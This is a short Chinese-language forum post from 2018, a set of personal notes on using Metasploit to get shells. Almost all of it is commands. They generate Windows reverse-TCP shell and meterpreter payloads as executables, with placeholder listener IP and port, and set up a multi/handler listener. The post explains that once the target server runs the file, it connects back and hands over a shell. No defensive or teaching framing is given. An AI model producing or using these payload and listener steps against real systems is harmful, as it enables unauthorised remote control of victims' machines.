ifuleyou 发表于 2018-8-19 11:05:33

msf shell笔记

  metasploit几种shellcode类型

[*]  可直接用nc接收的shell
  use payload/windows/x64/shell/reverse_tcp    #win64 使用tcp反弹的shellcode
  set lhost ip
  set lport port
  generate -t exe -f d:\1.exe#生成shellcode文件
[*]使用meterpreter接收的shell  use payload/windows/meterpreter/reverse_tcp#win 弹meterpreter的shellcode
  set lhost ip
  set lport port
  generate -t exe -f d:\1.exe#生成shellcode文件
  生成的文件不关类型,只要让对方服务器执行,且对方服务器可以访问到反弹的ip和端口,便会反弹到设置的ip和port上,只需要监听对应端口即可获得shell
  meterpreter监听命令
  use exploit/multi/handler
  set payload windows/meterpreter/reverse_tcp#该处payload可改成对应的payload,该项根据对方执行的shellcode类型
  set lhost
  set lport
  exploit   #执行后便会监听设置的端口,如果有访问则获得shell

页: [1]
查看完整版本: msf shell笔记